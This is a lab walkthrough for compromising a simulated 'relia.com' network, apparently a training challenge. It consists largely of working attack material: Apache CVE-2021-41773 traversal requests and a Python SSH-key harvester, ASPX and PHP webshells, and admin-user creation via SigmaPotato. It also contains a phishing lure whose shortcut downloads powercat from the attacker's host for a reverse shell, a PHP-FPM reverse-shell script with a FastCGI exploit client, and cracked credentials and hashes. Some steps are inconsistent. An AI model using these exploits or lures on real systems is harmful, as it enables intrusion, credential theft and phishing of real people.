I. Overview
16 machines in total. The third octet of the addresses differs from section to section (192.168.213.x, .239.x, .242.x, .206.x, .181.x, .210.x, .157.x and 172.16.173.x, .109.x, .147.x, .141.x, .134.x, .98.x, .117.x) because the lab subnet changed between sessions; the hosts themselves are the same throughout.
8 machines on the directly reachable 192 subnet:
192.168.213.249
192.168.213.248
192.168.213.247
192.168.213.246
192.168.213.245
192.168.213.191
192.168.213.189
192.168.213.250
8 machines on the internal 172 subnet:
172.16.173.6
172.16.173.7
172.16.173.21
172.16.173.19
172.16.173.15
172.16.173.30
172.16.173.14
172.16.173.20
Domain hosts (relia.com):
operatingsystem               dnshostname          ip
---------------               -----------          --
Windows Server 2022 Standard  DC02.relia.com       172.16.109.6
Windows Server 2022 Standard  MAIL.relia.com       172.16.109.5
Windows Server 2022 Standard  login.relia.com      172.16.109.254
Windows 11 Enterprise         WK01.relia.com       172.16.109.14
Windows 11 Enterprise         WK02.relia.com       172.16.109.15
Windows Server 2022 Standard  INTRANET.relia.com   172.16.109.7
Windows Server 2022 Standard  FILES.relia.com      172.16.109.21
Windows Server 2022 Standard  WEBBY.relia.com      172.16.109.30
II. Reconnaissance
Start by scanning every host on the 192 subnet:
nmap -Pn 192.168.239.249
nmap -Pn 192.168.213.248
nmap -Pn 192.168.213.247
nmap -Pn 192.168.213.246
nmap -Pn 192.168.213.245
nmap -Pn 192.168.213.191
nmap -Pn 192.168.213.189
nmap -Pn 192.168.213.250
III. Initial access
192.168.213.245
nmap -Pn 192.168.213.245 -p 21,80,443,2222,8000 -Av
21/tcp   open  ftp       vsftpd 2.0.8 or later
80/tcp   open  http      Apache httpd 2.4.49 ((Unix) OpenSSL/1.1.1f mod_wsgi/4.9.4 Python/3.8)
443/tcp  open  ssl/http  Apache httpd 2.4.49 ((Unix) OpenSSL/1.1.1f mod_wsgi/4.9.4 Python/3.8)
2222/tcp open  ssh       OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
8000/tcp open  http      Apache httpd 2.4.49 ((Unix) OpenSSL/1.1.1f mod_wsgi/4.9.4 Python/3.8)
Run dirsearch against the web ports.
Apache httpd 2.4.49 has a path traversal vulnerability (CVE-2021-41773): files outside the document root can be read and, where mod_cgi is enabled, the same path shape pointed at /bin/sh gives command execution. Exploit: https://www.exploit-db.com/exploits/50383
Read /etc/passwd (the POST body is the command-execution form of the exploit; when the path points at a regular file it is simply ignored):
curl -s --path-as-is -d "echo Content-Type: text/plain; echo; whoami" "http://192.168.239.245:8000/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
Check which key type anita uses: authorized_keys lists the public key type, which tells us which id_* file to fetch next.
curl -s --path-as-is -d "echo Content-Type: text/plain; echo; whoami" "http://192.168.239.245:8000/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/home/anita/.ssh/authorized_keys"
Download the private key (saved as anita_id_ecdsa, the name used by the cracking step below):
curl -s --path-as-is -d "echo Content-Type: text/plain; echo; whoami" "http://192.168.239.245:8000/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/home/anita/.ssh/id_ecdsa" > anita_id_ecdsa
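As an added example (not code from the original walkthrough), the three curl requests above in Python: the traversal path builder, the fetch, and the two parsing steps that lead from /etc/passwd to anita's id_ecdsa. The target host and port in the main block and the sample file contents are assumptions, not lab output.

```python
"""CVE-2021-41773 path traversal on Apache 2.4.49: read files, find users
with a login shell, and pull the private key whose type authorized_keys
reveals.  Added example; host/port and sample data are assumptions."""
import urllib.error
import urllib.request

# Apache 2.4.49's path normalisation does not treat ".%2e" (dot plus a
# URL-encoded dot) as "..", so the traversal check never fires while the
# filesystem still walks up one directory per segment.  The curl commands
# on the page use one ".%2e/" followed by nine "%2e%2e/" segments.
def traversal_path(target_file, depth=10):
    """Request path that reads target_file (absolute path) via /cgi-bin/."""
    if not target_file.startswith("/"):
        raise ValueError("absolute path expected")
    return "/cgi-bin/.%2e/" + "%2e%2e/" * (depth - 1) + target_file[1:]

def fetch(host, port, target_file, timeout=5):
    """Read target_file through the traversal; returns text or None.
    The POST body is the mod_cgi RCE form: with target_file="/bin/sh"
    the body runs as a shell script; for a regular file it is ignored."""
    url = f"http://{host}:{port}" + traversal_path(target_file)
    body = b"echo Content-Type: text/plain; echo; id"
    req = urllib.request.Request(url, data=body, method="POST")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.read().decode(errors="replace")
    except (urllib.error.URLError, OSError):
        return None

NON_LOGIN_SHELLS = ("nologin", "false", "sync", "halt", "shutdown")

def login_users(passwd_text):
    """(user, home) for every /etc/passwd entry with a real login shell."""
    users = []
    for line in passwd_text.splitlines():
        f = line.split(":")
        if len(f) == 7 and f[6].rsplit("/", 1)[-1] not in NON_LOGIN_SHELLS:
            users.append((f[0], f[5]))
    return users

KEY_FILE = {"ssh-rsa": "id_rsa", "ssh-dss": "id_dsa", "ssh-ed25519": "id_ed25519",
            "ecdsa-sha2-nistp256": "id_ecdsa", "ecdsa-sha2-nistp384": "id_ecdsa",
            "ecdsa-sha2-nistp521": "id_ecdsa"}

def key_files(authorized_keys_text):
    """Default private-key file names for the key types in authorized_keys;
    the public key type is what says to fetch id_ecdsa rather than id_rsa."""
    names = []
    for line in authorized_keys_text.splitlines():
        parts = line.split()
        # key options may precede the type, so take the first recognised token
        ktype = next((p for p in parts if p in KEY_FILE), None)
        if ktype and KEY_FILE[ktype] not in names:
            names.append(KEY_FILE[ktype])
    return names

def harvest_keys(host, port):
    """Walk /etc/passwd -> authorized_keys -> private key for each user."""
    found = {}
    passwd = fetch(host, port, "/etc/passwd")
    for user, home in login_users(passwd or ""):
        auth = fetch(host, port, f"{home}/.ssh/authorized_keys")
        for name in key_files(auth or ""):
            key = fetch(host, port, f"{home}/.ssh/{name}")
            if key and "PRIVATE KEY" in key:
                found[f"{user}/{name}"] = key
    return found

# Constructed sample data (not captured from the lab host)
SAMPLE_PASSWD = ("root:x:0:0:root:/root:/bin/bash\n"
                 "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
                 "anita:x:1000:1000:anita:/home/anita:/bin/bash\n")
SAMPLE_AUTHORIZED_KEYS = "ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAI constructed anita@relia\n"

if __name__ == "__main__":
    for name, key in harvest_keys("192.168.213.245", 8000).items():  # assumed target
        print(name)
        print(key)
```

The private key file the script writes out still has to be chmod 600 before ssh accepts it, and a passphrase-protected key goes through ssh2john as in the next step.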
Log in with the key. It is passphrase-protected, so crack the passphrase first:
ssh2john anita_id_ecdsa > anita_ssh.hash
john --wordlist=/usr/share/wordlists/rockyou.txt anita_ssh.hash
Then log in over port 2222 with the key and the cracked passphrase (chmod 600 the key file first, or ssh refuses it).
wget https://raw.githubusercontent.com/The-Z-Labs/linux-exploit-suggester/refs/heads/master/linux-exploit-suggester.sh
Run the script to list exploitable privilege-escalation CVEs; CVE-2021-3156 (the sudo "Baron Samedit" heap overflow) works here.
Get the flag.
192.168.X.246
Log in to 246 with the private key (and passphrase) obtained on 245; it is accepted directly.
ss -anp shows a service listening on 127.0.0.1:8000.
A backend/ directory is found there, and its index.php has a file inclusion vulnerability in the view parameter. Include /var/lib/php/sessions/sara.php:
curl "http://127.0.0.1:8000/backend/index.php?view=../../../../../../../../../var/lib/php/sessions/sara.php"
Get the flag.
192.168.X.248 -- done
Brute-force weak credentials, log in to the site, and modify the upload whitelist so .aspx is allowed.
Upload an ASPX one-liner webshell (the code to run arrives in the request parameter w):
<%@ Page Language="Jscript" validateRequest="false" %><%Response.Write(eval(Request.Item["w"],"unsafe"));%>
http://192.168.242.248/portals/0/1.aspx
Connect with AntSword.
Privilege escalation with SigmaPotato (it needs SeImpersonatePrivilege, which the IIS application pool account normally holds).
Upload SigmaPotato.exe through AntSword.
Create the user sara and add her to the Administrators group:
SigmaPotato.exe "net user sara 1qaz2wsxA /add"
SigmaPotato.exe "net localgroup Administrators sara /add"
xfreerdp /cert-ignore /u:sara /p:1qaz2wsxA /v:192.168.242.248 /drive:shared,/home/kali/yc
Get the flag.
192.168.X.249 LEGACY -- done
1. dirsearch -u http://192.168.206.249:8000/cms -x 403,401,404
Open Filemanager in the CMS and upload a one-liner webshell.
Delete this file.
Connect with AntSword.
Privilege escalation with SigmaPotato, as on 248.
Upload SigmaPotato.exe through AntSword.
Create the user sara and add her to the Administrators group:
.\SigmaPotato "net user sara 1qaz2wsxA /add"
.\SigmaPotato "net localgroup Administrators sara /add"
xfreerdp /cert-ignore /u:sara /p:1qaz2wsxA /v:192.168.206.249 /drive:shared,/home/kali/yc
Get the flag.
Information gathering: the CMS git history shows a deleted configuration file that contained mail credentials:
diff --git a/htdocs/cms/data/email.conf.bak
b/htdocs/cms/data/email.conf.bak
deleted file mode 100644
index 77e370c..0000000
--- a/htdocs/cms/data/email.conf.bak
+++ /dev/null
@@ -1,5 +0,0 @@
-Email configuration of the CMS
[email protected]:DPuBT9tGCBrTbR
-
-If something breaks contact [email protected] as he is responsible for
the mail server.
-Please don't send any office or executable attachments as they get
filtered out for security reasons.
\ No newline at end of file
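Review bot: removing htdocs/cms/data/email.conf.bak does not remove the mail credential on its deleted second line (the [email protected]:DPuBT9tGCBrTbR entry); it stays in the repository history and is recoverable with `git log -p -- htdocs/cms/data/email.conf.bak`, which is exactly how this walkthrough obtained it. The deletion needs to be paired with rotating that mail password and, if the history is to be cleaned, with rewriting it (for example with git filter-repo) rather than relying on the file removal alone. The deleted note that office and executable attachments are filtered also tells anyone reading the history which attachment types the mail filter does not block.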
172.16.147.14 WK01
Get a reverse shell by sending jim a phishing email.
1. Set up a WebDAV share on Kali:
/usr/local/bin/wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/beyond/webdav/
2. Prepare the Windows library file.
Log in to 192.168.199.250 with the credentials provided by the lab, open Visual Studio, create a new file and save it as config.Library-ms with the content below; the url element is the address of Kali's WebDAV server:
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@windows.storage.dll,-34582</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <iconReference>imageres.dll,-1003</iconReference>
  <templateInfo>
    <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
  </templateInfo>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <isSupported>false</isSupported>
      <simpleLocation>
        <url>http://192.168.45.250</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
3. Create the shortcut.
Start a web server (port 8000) in the directory holding powercat.ps1 on Kali, and listen with nc on port 4444.
On the Windows machine, right-click, create a new shortcut, and enter this as the target:
powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.250:8000/powercat.ps1'); powercat -c 192.168.45.250 -p 4444 -e powershell"
When done, copy the config.Library-ms library file and the _configuration shortcut to Kali: the shortcut goes into the WebDAV root, which is where the library points, and the library file is attached to the mail in the next step.
4. Send jim the email.
Body of the email:
Hey Jim!
I checked CMS and discovered that the previously used staging
script still exists in the Git logs. I'll remove it for security reasons.
On an unrelated note, please install the new security features on
your workstation. For this, download the attached file, double-click
on it, and execute the configuration shortcut within. Thanks!
Maildmz
Save the body as body.txt and send it with swaks (only the tail of the command line is recorded; @config.Library-ms is the argument of --attach):
@config.Library-ms --server 192.168.181.189 --body @body.txt --header "Subject: Staging Script" --suppress-data -ap [email protected]:DPuBT9tGCBrTbR
5. Get the flag.
6. Information gathering:
Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue
Upload Database.kdbx to Kali and crack the master password:
keepass2john Database.kdbx > keepass.hash
hashcat -m 13400 keepass.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/rockyou-30000.rule --force
The KeePass master password is mercedes1. Entry found in the database:
| Username | Password        | Title             |
| -------- | --------------- | ----------------- |
| dmzadmin | SlimGodhoodMope | LOGIN local admin |
192.168.181.191
1. Initial access
Log in as dmzadmin. 191 has 3389 open, so RDP in directly:
xfreerdp /cert-ignore /u:dmzadmin /p:SlimGodhoodMope /v:192.168.181.191
2. Get the flag
3. Information gathering
Add jim to the administrators group.
.\Rubeus.exe asreproast /nowrap
Crack michelle's AS-REP hash (hashcat mode 18200):
[email protected]:2162CDDB642DBC472D28A4DD7F3C562F$F9B73691BAA38B6C72F29138A64E85F60282ACE453F58801D532DDC3E9A77275338E485EEE2DF8B7798409EAEAEFD9426405C3C5E53F53120B9BA38A517B2349F01856BA532088961F05E899061045F1814AB5F916F071454A6CF24C71FB9342AFDE7C8CF6D081B74ECC080A9E205126E6B3AF93706446E92E5954E428F50172D858E7EFFBB06DB27ACFABE266FE2AC04B18846CF50E0F9776AD831166F7ACD5611F02B1534C64CA794DC0AE4066859C221D3D68D1EB7FC20ECED78648B95FC25856A738FC3A7ADDE593E76E7699A161EDE7AD369EBE6A61A4410E34000A3030892A458F88FA
sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
michelle's password: NotMyPassword0k?
A Kerberoast hash (TGS-REP, hashcat mode 13100) for the iis_service service account was also collected:
$krb5tgs$23$iis_service$relia.com$http/[email protected]$5568A9E42045995BACE10D7DD08FB590$72C47F452372EAE5A82F612E23EAAE5F71D228AEA279AF02EFBF67B00F90B54EA62A894F88AFF77FBB7D09E6D6F55570EC36648AF98C7C15340C55016322A6DC7A904E448271234746786D9845593583E0B2FB661B9DB685BA8A4F509383F19831257501D853DC211972EFC7F3DAC6907130875EB8CF83F43ED6B138B162E14F470F5D988190E265CB6BA5ACF9C2AF90DA66D7E472FE73726FB741F46863213AE9A924AA63E2AD432C6E2AEC38F559CEA3F9280BE66EC998E5F0881A9F75E7729C55765F388EF9A7749E585673E7801539814BE28BE07C7123C45949F9578840DE208FC4DD518F4600CBFCC7023DA09F6FFEE22268010495E93FB59C1E6EEB839B2D7DDF642425A7F448A305CD0AB0A9F3819937353CE9D3F06C7310BC304D75F8A32A283C902B17ADBDF62D0622D48C090EB7AF1563FA11C9646FF89E372755CD3E9CA3D0E8667C8CC48D8D3D73BBC5A1F50B664AF624352FEB82DA75AE50965168659DBDF44BF5546D2ADF38204E4BD6B924A845496E84E41DE832F3FB764026EFA02E139396662298B744F85E56E0930787D3E00CB02E40E1EF8E55A022A57E4DCBBC83DCA0465859DE8F1DA7F37E0C9D6D16BA49868A6EDB671C40CE87E463FBE2ECC9E85F3FAEADF7BFCE82E631A1B1B5D5ADBB8FFB3972431AD538CCD912949C3E6E9811C93C8A7EC2319DF8338FC7379C8FB23EA5F294E12313D8F99995F8C195B8CEDF83ED94B6E31885DCECBC5EBB10928EE184AEF8438E3E765CD36AAD8072A649254323BBE685ED87508D6A8CCC6C57AF432724BFD168CFE5869C1973F779A03DD6F8C7B4E3F0C42C5C803040361B1C4152F2D19B8BC72A4C589C2BED8C80D240B2777843FFC540854D05D1C047CE4D7F0C643CF685C6D894CC87ACF6522AC867D66525642F19279C8EDB4BDE0112495F7CFE4F94A81FB9535810666A43A5A651E2B36671473A0C109EA310FBF075E438D4E38241FAFA675952402028B99CEFCB030049963E1D070633ED439253DEE5C43D0774DC0ADCED317B90B62C803A7C4D90C37F8D6B8AC6C5CC2AC1CBEB3032CE887DADF39F7D10BED55DD5CB47F052FE740463F525409DB8AFA03CF12AF10DE0CC29F714D111F1D0CE6BE7D2D13313A10036975137F14D15F6E8CA0561CAB81CBA9970C1F7B594B3D79B6D1D4ED372CA2C4DDABD91CF1F62C489D96B44C9BD2AC545488A5B85086380CAED80F839646BA1D96D12B85B432AF73B28914BDA1613715751CDAE9E80948A45A04FAC5E6A6E3B93986BD4360B58CB1328F8EB81FDB833C6769241AD78C11E6A86E59B364C64B3C788FADFE46ED70DDAD5378C4943DC895438F4C16B1BD32C4311CF53F0AD5B931004A13AC36CCD160EB720653EA855C4754304BF6A170BC1988BAADBC751BA28B4CDCF55AD4D1D4323579C67E8340E16807F560AF4DA3A3E7AC78DF9C719C7EBD8F0DEEA32DF384D403F063A641E5CC40E160FD122EF6997640C95AAE97F0EF49CCF15EBF17EE0684623EF13E9E0E173
172.16.141.7 INTRANET
1. Initial access
Log in with michelle's password NotMyPassword0k? collected on 191.
2. Get the flag
The administrator flag is obtained after privilege escalation.
3. Privilege escalation
Through the Apache httpd service: it runs as LOCAL SYSTEM and the web root C:\xampp\htdocs is writable, so a shell dropped there runs as SYSTEM.
Write the shell, shell.php:
<?php @system($_GET["cmd"]);?>
http://127.0.0.1/shell.php?cmd=net%20localgroup%20Administrators%20michelle%20/add
Then log in again (the new group membership only applies to a fresh logon).
Get the administrator flag.
4. Information gathering
Dump credentials with mimikatz; andrea's NTLM hash:
Username : andrea
Domain   : RELIA
* NTLM   : ce3f12443651168b3793f5fbcccff9db
hashcat -m 1000 andrea.ntml /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
172.16.134.15 WK02
1. Initial access
Log in as andrea with the password PasswordPassword_6 cracked from the hash collected on 172.16.141.7 (the jump host 191 is reached as before):
xfreerdp /cert-ignore /u:dmzadmin /p:SlimGodhoodMope /v:192.168.210.191
2. Privilege escalation
C:\schedule.ps1 runs once a minute; insert a line at the top of the file that adds andrea to the Administrators group.
3. Get the flag
4. Information gathering
Upload Database.kdbx to Kali and crack the master password:
keepass2john Database.kdbx > keepass.hash
hashcat -m 13400 keepass.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/rockyou-30000.rule --force
Result:
172.16.98.19 backup
1. Initial access
xfreerdp /cert-ignore /u:dmzadmin /p:SlimGodhoodMope /v:192.168.210.191
On 191, forward port 2222 to 172.16.170.19:22:
netsh interface portproxy add v4tov4 listenport=2222 listenaddress=192.168.210.191 connectport=22 connectaddress=172.16.170.19
netsh advfirewall firewall add rule name="port_forward_ssh_2222" protocol=TCP dir=in localip=192.168.210.191 localport=2222 action=allow
Log in with sarah's private key obtained on WK02, and copy pspy64 over through the forward:
scp -i sarahprivitekey -P 2222 /home/kali/offsec/Tools/kaliTools/pspy64 [email protected]:/home/sarah
2. Get the flag
3. Privilege escalation
./pspy64 -pf -i 1000 | grep borg shows root's backup job passing the borg passphrase on the command line:
2025/06/07 07:05:18 CMD: UID=0 PID=6099 | /usr/bin/python3 /usr/bin/borg create /opt/borgbackup::usb_1749279918 /media/usb0
2025/06/07 07:05:18 CMD: UID=0 PID=6098 | /bin/sh -c BORG_PASSPHRASE='xinyVzoH2AnJpRK9sfMgBA' borg create /opt/borgbackup::usb_1749279918 /media/usb0
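As an added example (not code from the original walkthrough), a small scanner for pspy output that flags credentials a job exposes on its command line, the way the borg passphrase above was found. The sample input is the two borg lines from the page plus constructed noise; the sshpass line in the sample, including its backup@10.0.0.5 target, is constructed and not lab output. The name patterns are a heuristic and will occasionally match a harmless variable.

```python
"""Find secrets in process command lines captured by pspy.  Added example;
the sample lines are partly constructed, see the lead-in."""
import re

# pspy line: "YYYY/MM/DD HH:MM:SS CMD: UID=0    PID=123  | command ..."
PSPY_LINE = re.compile(r"^(\S+ \S+)\s+CMD:\s+UID=(\d+)\s+PID=(\d+)\s+\|\s+(.*)$")

# 1) environment-style assignments whose name suggests a secret, e.g.
#    BORG_PASSPHRASE='...' or DB_PASSWORD=...
ENV_SECRET = re.compile(
    r"\b([A-Z][A-Z0-9_]*(?:PASS|PASSWORD|PASSPHRASE|SECRET|TOKEN|KEY)[A-Z0-9_]*)="
    r"(?:'([^']*)'|\"([^\"]*)\"|(\S+))")

# 2) tools that take the password as a command-line option
OPT_SECRET = re.compile(
    r"\b(sshpass|mysql|mysqldump)\b.*?\s-p\s*(?:'([^']*)'|\"([^\"]*)\"|(\S+))")

def _value(match):
    """First non-empty capture after the name/tool group (quoted or bare)."""
    return next(g for g in match.groups()[1:] if g is not None)

def secrets_from_pspy(lines):
    """Return one dict per exposed secret: uid, pid, source, secret, cmd."""
    findings = []
    for line in lines:
        m = PSPY_LINE.match(line.strip())
        if not m:
            continue
        _ts, uid, pid, cmd = m.groups()
        for em in ENV_SECRET.finditer(cmd):
            findings.append({"uid": int(uid), "pid": int(pid),
                             "source": em.group(1), "secret": _value(em), "cmd": cmd})
        for om in OPT_SECRET.finditer(cmd):
            findings.append({"uid": int(uid), "pid": int(pid),
                             "source": om.group(1) + " -p", "secret": _value(om), "cmd": cmd})
    return findings

# Constructed sample: the two borg lines from the page, a constructed
# sshpass line (host and user are placeholders), and one harmless line.
SAMPLE = """\
2025/06/07 07:05:18 CMD: UID=0 PID=6099 | /usr/bin/python3 /usr/bin/borg create /opt/borgbackup::usb_1749279918 /media/usb0
2025/06/07 07:05:18 CMD: UID=0 PID=6098 | /bin/sh -c BORG_PASSPHRASE='xinyVzoH2AnJpRK9sfMgBA' borg create /opt/borgbackup::usb_1749279918 /media/usb0
2025/06/07 07:05:19 CMD: UID=1001 PID=6102 | sshpass -p "Rb9kNokjDsjYyH" rsync backup@10.0.0.5:/etc/ /opt/backup/etc/
2025/06/07 07:05:19 CMD: UID=0 PID=6103 | /usr/sbin/cron -f
"""

if __name__ == "__main__":
    for f in secrets_from_pspy(SAMPLE.splitlines()):
        print(f"uid={f['uid']} pid={f['pid']} {f['source']} -> {f['secret']}")
```

The passphrase is visible because it sits inside the string handed to `sh -c`, so it is part of sh's argv, and /proc/PID/cmdline is readable by every local user unless /proc is mounted with hidepid=2; /proc/PID/environ, by contrast, is only readable by the process owner. A job that exported the variable inside its own script, or used BORG_PASSCOMMAND to read the secret from a root-only file, would not show up here.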
sarah can run borg with sudo; with that passphrase, extract the home archive to stdout:
sudo /usr/bin/borg extract --stdout /opt/borgbackup::home
The archive contains a backup script with rsync credentials and a configuration file with a hashed password:
sshpass -p "Rb9kNokjDsjYyH" rsync [email protected]:/etc/ /opt/backup/etc/
"user": "amy",
"pass": "0814b6b7f0de51ecf54ca5b6e6e612bf"
The hash cracks to backups1, amy's password.
Switch to amy; amy has sudo rights.
Get the flag.
172.16.98.20
1. Initial access
Log in with the credentials obtained from 19 (the rsync line in the backup script):
sshpass -p "Rb9kNokjDsjYyH" rsync [email protected]:/etc/ /opt/backup/etc/
On 191, forward port 2222 to 172.16.117.20:22:
xfreerdp /cert-ignore /u:dmzadmin /p:SlimGodhoodMope /v:192.168.157.191
netsh interface portproxy add v4tov4 listenport=2222 listenaddress=192.168.157.191 connectport=22 connectaddress=172.16.117.20
netsh advfirewall firewall add rule name="port_forward_ssh_2222" protocol=TCP dir=in localip=192.168.157.191 localport=2222 action=allow
A local listener on port 9000 (PHP-FPM's FastCGI socket) is found.
2. Privilege escalation
Use the script below to get a reverse shell. The payload is bash -c 'bash -i >&/dev/tcp/172.16.117.20/9999 0>&1', base64-encoded; it calls back to 20's own address, so the nc listener on 9999 runs in the existing low-privileged SSH session on 20 and the shell crosses privilege levels, not hosts:
YmFzaCAtYyAnYmFzaCAtaSA+Ji9kZXYvdGNwLzE3Mi4xNi4xMTcuMjAvOTk5OSAwPiYxJw==
#!/bin/bash
# Reverse shell through PHP-FPM: auto_prepend_file loads PHP code from a data:// URI
PAYLOAD="<?php echo '<!--';system(base64_decode('YmFzaCAtYyAnYmFzaCAtaSA+Ji9kZXYvdGNwLzE3Mi4xNi4xMTcuMjAvOTk5OSAwPiYxJw==')); echo '-->';"
FILENAMES="/usr/local/www/apache24/data/info.php"   # Existing file path (FPM needs a script that exists)
HOST=$1
B64=$(echo "$PAYLOAD" | base64 -w0)   # -w0: no line wrapping inside the data:// URI
for FN in $FILENAMES; do
    OUTPUT=$(mktemp)
    env -i \
        PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
        SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
        cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT
    cat $OUTPUT
done
Because 20 has no base64 binary, the script cannot be run on the target itself; forward port 9000 out with an SSH local forward and run the script from Kali against the forwarded port (binding 0.0.0.0 exposes the forward to Kali's whole network; 127.0.0.1 is enough when the script runs on Kali):
ssh -N -L 0.0.0.0:9000:127.0.0.1:9000 [email protected] -p 2222
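Added example, not code from the original page: a minimal FastCGI client in Python that performs the same PHP-FPM trick as the cgi-fcgi script above, run from Kali against the forwarded port, so neither base64 nor cgi-fcgi is needed on either side. The host, port, script path and PHP payload are assumptions. It sends the PHP code as the request body and sets auto_prepend_file=php://input instead of a data:// URI; and because allow_url_include is a PHP_INI_SYSTEM setting, it goes in PHP_ADMIN_VALUE (FPM applies PHP_VALUE at user level), which is the one behavioural difference from the bash script.

```python
"""Tiny FastCGI client for PHP-FPM: runs the POST body as PHP via
auto_prepend_file=php://input.  Added example; target details are assumed."""
import socket
import struct

FCGI_BEGIN_REQUEST, FCGI_PARAMS, FCGI_STDIN, FCGI_STDOUT = 1, 4, 5, 6
FCGI_RESPONDER = 1

def fcgi_record(rtype, content, req_id=1):
    """One FastCGI record: 8-byte header, content, zero padding to 8 bytes."""
    pad = (-len(content)) % 8
    hdr = struct.pack(">BBHHBx", 1, rtype, req_id, len(content), pad)
    return hdr + content + b"\x00" * pad

def encode_params(params):
    """FCGI_PARAMS body: name/value pairs, each length in one byte when
    below 128, otherwise four bytes with the high bit set."""
    out = b""
    for name, value in params.items():
        n, v = name.encode(), value.encode()
        for ln in (len(n), len(v)):
            out += struct.pack(">B", ln) if ln < 128 else struct.pack(">I", ln | 0x80000000)
        out += n + v
    return out

def build_request(script, php_code, req_id=1):
    """BEGIN, PARAMS, empty PARAMS, STDIN (the PHP code), empty STDIN."""
    body = php_code.encode()
    params = {
        "GATEWAY_INTERFACE": "FastCGI/1.0",
        "REQUEST_METHOD": "POST",
        "SCRIPT_FILENAME": script,   # must exist on the target
        "SCRIPT_NAME": script,
        "REQUEST_URI": script,
        "DOCUMENT_ROOT": "/",
        "SERVER_SOFTWARE": "php/fcgiclient",
        "REMOTE_ADDR": "127.0.0.1",
        "REMOTE_PORT": "9985",
        "SERVER_ADDR": "127.0.0.1",
        "SERVER_PORT": "80",
        "SERVER_NAME": "localhost",
        "SERVER_PROTOCOL": "HTTP/1.1",
        "CONTENT_TYPE": "application/x-www-form-urlencoded",
        "CONTENT_LENGTH": str(len(body)),
        # prepend the request body as PHP before `script` runs ...
        "PHP_VALUE": "auto_prepend_file = php://input",
        # ... which needs allow_url_include, a PHP_INI_SYSTEM setting
        "PHP_ADMIN_VALUE": "allow_url_include = On",
    }
    begin = struct.pack(">HB5x", FCGI_RESPONDER, 0)   # role, flags (no keep-conn)
    return (fcgi_record(FCGI_BEGIN_REQUEST, begin, req_id)
            + fcgi_record(FCGI_PARAMS, encode_params(params), req_id)
            + fcgi_record(FCGI_PARAMS, b"", req_id)
            + fcgi_record(FCGI_STDIN, body, req_id)
            + fcgi_record(FCGI_STDIN, b"", req_id))

def parse_stdout(data):
    """Concatenate the FCGI_STDOUT record bodies of a response stream."""
    out, i = b"", 0
    while i + 8 <= len(data):
        _ver, rtype, _rid, clen, pad = struct.unpack(">BBHHBx", data[i:i + 8])
        if rtype == FCGI_STDOUT:
            out += data[i + 8:i + 8 + clen]
        i += 8 + clen + pad
    return out

def run(host, port, script, php_code, timeout=10):
    """Send the request and return what PHP wrote to stdout (headers included)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_request(script, php_code))
        chunks = []
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            chunks.append(chunk)
    return parse_stdout(b"".join(chunks))

if __name__ == "__main__":
    # Assumed: port 9000 of 20 forwarded to localhost (ssh -L as above) and
    # info.php present in the Apache document root.
    print(run("127.0.0.1", 9000, "/usr/local/www/apache24/data/info.php",
              "<?php system('id'); ?>").decode(errors="replace"))
```

SCRIPT_FILENAME must name a PHP file that exists on the target, otherwise FPM answers "Primary script unknown" without running anything, which is why the page points at info.php. To reproduce the reverse shell, put the bash one-liner in the system() call and start the listener on 20 first.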
3. Get the flag
4. Information gathering
sshpass -p "DRtajyCwcbWvH/9" ssh [email protected]
172.16.117.21 FILES
1. Initial access
Log in with the credentials obtained from 20.
On 191, forward port 2222 to 172.16.117.21:5985 (WinRM). The firewall rule must open the listening port 2222 (the rule as originally run opened 5985, which presumably only worked because the 2222 rule from the earlier SSH forward was still in place):
netsh interface portproxy add v4tov4 listenport=2222 listenaddress=192.168.157.191 connectport=5985 connectaddress=172.16.117.21
netsh advfirewall firewall add rule name="port_forward_ssh_2222" protocol=TCP dir=in localip=192.168.157.191 localport=2222 action=allow
Access 21 over SMB directly from 191.
A script on the share builds a credential object with the domain administrator's password in plaintext (fragment as found):
ConvertTo-SecureString "vau!XCKjNQBv2$" -AsPlainText ... ("RELIA\Administrator", $spass)
2. Privilege escalation
3. Get the flag
172.16.173.6 DC02
1. Initial access
Log in with RELIA\Administrator / "vau!XCKjNQBv2$" obtained on 172.16.117.21 FILES.
2. Get the flag
172.16.173.30 WEBBY
1. Initial access
Log in with RELIA\Administrator / "vau!XCKjNQBv2$" obtained on 172.16.117.21 FILES.
2. Get the flag
172.16.109.5 MAIL
1. Initial access
Log in with RELIA\Administrator / "vau!XCKjNQBv2$" obtained on 172.16.117.21 FILES.
2. Get the flag